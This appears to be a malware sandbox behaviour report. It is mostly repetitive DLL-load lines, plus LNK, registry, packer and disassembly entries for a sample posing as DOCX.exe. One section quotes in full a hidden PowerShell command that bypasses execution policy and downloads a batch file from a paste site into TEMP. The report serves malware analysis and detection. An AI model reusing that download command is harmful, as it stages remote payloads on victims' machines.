Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Program Files\7-Zip\7z.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\timeout.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: twext.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: policymanager.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: msvcp110_win.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: shacct.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: idstore.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: samlib.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: starttiledata.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: acppage.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: msi.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: aepic.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: wlidprov.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: samcli.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: provsvc.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: twext.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: starttiledata.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: acppage.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: msi.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: aepic.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	Section loaded: sfc_os.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll

Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Source: Google Drive.lnk.21.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.21.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.21.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.21.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.21.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.21.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: TGWEKK.lnk.46.dr	LNK file: ..\..\..\..\..\Windata\XVZBZS.exe

Source: C:\ProgramData\Synaptics\Synaptics.exe

File written: C:\Users\user\AppData\Local\Temp\MsCzVbC.ini

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/cdfd23f3b9ad', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/cdfd23f3b9ad', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))"			Jump to behavior

Source: C:\Users\user\Desktop\._cache_DOCX.exe

Code function: 46_2_007F80C0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,

46_2_007F80C0

Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_0070851D push 00000000h; iretd	46_2_00708527
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006BCB5D push edi; ret	46_2_006BCB5F
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006BCC76 push esi; ret	46_2_006BCC78
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006B7795 push ecx; ret	46_2_006B77A8
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_0042CB5D push edi; ret	60_2_0042CB5F
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_0042CC76 push esi; ret	60_2_0042CC78
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_00427795 push ecx; ret	60_2_004277A8

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
